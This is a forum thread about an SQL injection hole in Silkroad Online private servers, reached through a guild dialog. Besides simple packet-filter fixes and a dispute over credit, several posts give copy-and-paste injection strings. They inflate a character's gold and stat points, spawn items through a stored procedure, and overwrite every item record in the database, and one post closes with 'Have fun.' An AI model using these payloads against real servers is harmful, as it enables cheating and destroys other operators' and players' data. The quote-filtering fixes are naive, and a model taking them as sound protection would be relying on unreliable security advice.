|
You last visited: Today at 16:20
Advertisement
[INFORMATION] SQL Injection (ingame)
Discussion on [INFORMATION] SQL Injection (ingame) within the SRO Private Server forum part of the Silkroad Online category.
09/05/2016, 21:12
|
#1
|
elite*gold: 56
Join Date: Oct 2013
Posts: 1,165
Received Thanks: 762
|
[INFORMATION] SQL Injection (ingame)
Hello Elitepvpers,
I just want to inform you that i discovered a new very harmful exploit.
It is possible to execute a SQL Injection through the Fortresswar Administrator NPC with the "About Guild" dialog.
Requirements:
Quote:
-own a fortresswar
-be the Guild Master
|
example:
this example will shutdown the sql server
Screenshot:
|
|
|
09/05/2016, 21:43
|
#2
|
elite*gold: 0
Join Date: Apr 2015
Posts: 1,444
Received Thanks: 1,371
|
Fix for packet filters
PHP Code:
#region 0x705E_CLIENT_EXPLOIT if(_pck.Opcode == 0x705E) { string message = _pck.ReadAscii(); if(message.Contains("'")) { //message; continue; } else if(message.Contains("\"")) { //message; continue; } else if(message.Contains("-")) { //message; continue; } } #endregion
|
|
|
09/05/2016, 22:33
|
#3
|
elite*gold: 0
Join Date: Mar 2011
Posts: 162
Received Thanks: 27
|
thanks Goofie
|
|
|
09/05/2016, 22:33
|
#4
|
elite*gold: 28
Join Date: Aug 2014
Posts: 4,096
Received Thanks: 2,649
|
Quote:
Originally Posted by Goofie
Fix for packet filters
PHP Code:
#region 0x705E_CLIENT_EXPLOIT if(_pck.Opcode == 0x705E) { string message = _pck.ReadAscii(); if(message.Contains("'")) { //message; continue; } else if(message.Contains("\"")) { //message; continue; } else if(message.Contains("-")) { //message; continue; } } #endregion
|
PHP Code:
if (new[] { '-','\\','\'' }.Any(a => message.Contains(a))) { //message; continue; }
short qode, qood qode. Also, I think SQL parsers are better for analyzing such strings.
|
|
|
09/06/2016, 00:53
|
#5
|
elite*gold: 125
Join Date: Aug 2011
Posts: 4,392
Received Thanks: 4,351
|
Doesn't work on sro-r alteast hihi
|
|
|
09/06/2016, 01:06
|
#6
|
elite*gold: 0
Join Date: Dec 2011
Posts: 169
Received Thanks: 101
|
Quote:
Originally Posted by OutlawNL
Doesn't work on sro-r alteast hihi
|
Or you just messed up when trying it
|
|
|
09/06/2016, 05:54
|
#7
|
elite*gold: 0
Join Date: Sep 2009
Posts: 247
Received Thanks: 127
|
Credits for the pic (? xD
Some funny sql injections you can do without any error at gameserver:
1. Add Gold to your character
a'; UPDATE _Char SET RemainGold = 99999999999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a
2. Add more stats to your character
a'; UPDATE _Char SET RemainStatPoint = 99999 WHERE CharName16 = 'YourName'; UPDATE _SiegeFortress SET Introduction = 'a
3. If you know the item codes, why not create some of them?
a'; exec _ADD_ITEM_EXTERN 'Charname','ITEM_EU_TSWORD_11_SET_A_RARE',0,20; UPDATE _SiegeFortress SET Introduction = 'a
If you want to **** off the database(dont do it if you are not the server admin, ok no):
a'; UPDATE _Items SET RefItemID = 0; UPDATE _SiegeFortress SET Introduction = 'a
Just copy & paste this injections to the fortress dialog.
Have fun.
|
|
|
09/06/2016, 07:24
|
#8
|
elite*gold: 166
Join Date: Apr 2009
Posts: 2,339
Received Thanks: 2,654
|
just another simple reason to use the beautiful BR files
|
|
|
09/06/2016, 10:05
|
#9
|
elite*gold: 56
Join Date: Oct 2013
Posts: 1,165
Received Thanks: 762
|
Quote:
Originally Posted by WickedNite.
You ******* leecher.
Really? You discovered? Go **** yourself.
|
Yes, i discovered them by my Self by checking the GameServer Logs.
A Guild Master wrote "we're".
Just because MegaMax said he told me that doesnt means its true (actually i was unsure so i checked the whole Skype history and i couldn't find anything about an sql injection)
So if u think to Talk about **** without even asking the other side go **** your self
Srsly that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"
Pff shame on you
|
|
|
09/06/2016, 10:26
|
#10
|
elite*gold: 1537
Join Date: Sep 2006
Posts: 1,085
Received Thanks: 2,346
|
Quote:
Originally Posted by Syloxx
Yes, i discovered them by my Self by checking the GameServer Logs.
A Guild Master wrote "we're".
Just because MegaMax said he told me that doesnt means its true (actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)
So if u think to Talk about **** without even asking the other side go **** your self
Srsly that's Camel Level: "I have no clue what's up but I am a fanboy of Mega so it must be true!"
Pff shame on you
|
"(actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)"
^ how if you blocked me from skype yourself.
Srsly ? it was on discord epvp #main channel before you quit it, i wrote it public and you said you will check it, i said ok. But look i dont wanna be rude because there is no reason to, but if you are going to force me to be it wont go to any good level.
You are the one who on Srsly that's Camel Level:
Shame on you Syloox never thought you will be owed by anyone or because he did vsro 274 bot for you ?
|
|
|
09/06/2016, 10:44
|
#11
|
elite*gold: 56
Join Date: Oct 2013
Posts: 1,165
Received Thanks: 762
|
Quote:
Originally Posted by MeGaMaX.
"(actually i was unsure so i checked the whole Skype history and i could find anything about an sql injection)"
^ how if you blocked me from skype yourself.
Srsly ? it was on discord epvp #main channel before you quit it, i wrote it public and you said you will check it, i said ok. But look i dont wanna be rude because there is no reason to, but if you are going to force me to be it wont go to any good level.
You are the one who on Srsly that's Camel Level:
Shame on you Syloox never thought you will be owed by anyone or because he did vsro 274 bot for you ?
|
1st of all I never blocked u all I just removed u from contacts, because we weren't active talking anymore (I like to clean up my Skype contacts periodically)
2nd skype history is stored on my iPhone
3rd I report that to Weeman because a friend of mine uses his Filter.
4th about Discord I was there only once for maybe 15mins and I didn't even communicate with you there.
So if you are 100% sure I wrote it then someone just used my name (for that 15 min I didn't even had Syloxx as name I had smt like "SpidyForceMeToBeHere")
|
|
|
09/06/2016, 11:19
|
#12
|
elite*gold: 0
Join Date: Jan 2009
Posts: 462
Received Thanks: 219
|
Seriously who cares about who found it? Important thing is that it's known and will be fixed.
|
|
|
09/06/2016, 14:09
|
#13
|
elite*gold: 0
Join Date: Oct 2015
Posts: 45
Received Thanks: 81
|
Creating new instance of LogWriter on every call ? DAFAQ.
Also, u can return after executing CleanClient
|
|
|
09/06/2016, 15:08
|
#14
|
elite*gold: 0
Join Date: Mar 2015
Posts: 402
Received Thanks: 154
|
?
|
|
|
09/06/2016, 16:50
|
#15
|
elite*gold: 294
Join Date: Sep 2013
Posts: 1,410
Received Thanks: 635
|
Quote:
Originally Posted by Hedgehock
Creating new instance of LogWriter on every call ? DAFAQ.
Also, u can return after executing CleanClient
|
Yeah this was the first hotfix (disconnecting the exploiter).
I rewrote it to replacing the corresponding strings to *.
About the logwriter: indeed its newly created, but guess how often some1 uses the about guild function?
Its used that less that it took about 8 years to find that leak which makes sql injections possible. so, sorry du Model :*
Quote:
Originally Posted by Gidzy
?
|
You messed something up.
Check your Code again.
Code:
test'; update _Char set RemainStatPoint = 999 where CharName16 = 'yourCharnameHere';--
|
|
|
|
|
Similar Threads
|
[Information] Was bedeuten die Zahlen oben?, Was bekomme ich? [Information]
12/16/2010 - WarRock - 3 Replies
Hi com,
wie bestimmt schon ihr alle bemerkt habt, gab es ein Update und somit ein neues Event (Habe ich aber auch gestern gegen 02:00 Uhr gepostet.
Also ich möchte hier mal Klarstellen, was es mit dem Event aufsich hat.
-Was bedeuten diese Zahlen oben Links?
Also, Links steht am Anfang 300, das heißt ihr müsst 300 Kills mit Schneebällen erreichen und bekommt Anschließend einen Preis! Nach 300 kommen 500, dannach 700 und Anschließend 900, vielleicht mehr, was ich leider nicht weiss.
|
miss information about dll injection
09/26/2009 - Aion - 0 Replies
nvm..
|
C# Get ingame information
01/09/2009 - Silkroad Online - 2 Replies
Hi all,
I know more or less how I can get ingame information with CE, but I would like to know how can I get the CE information in C# or visual basic because I want to make an application with it but I don't know how use CE's information. I can't find anything..
Thanks a lot in advance. :)
uoah
|
Ingame injection
03/27/2008 - Dekaron - 7 Replies
Hey guys..
I just want to know if there is one way to inject hacks into game by hitting F12 or any else.
Like the Hacks for Counter-Strike..U start them, start the game and when u are ingame u hit F12 and a Menu pops up where u can change some values like Autoshoot, Aimbot, Speedhack and so on..
Now my question:
Is there any way to get Hacks injected, when u are already ingame?
Greez
spam
|
All times are GMT +2. The time now is 16:20.
|
|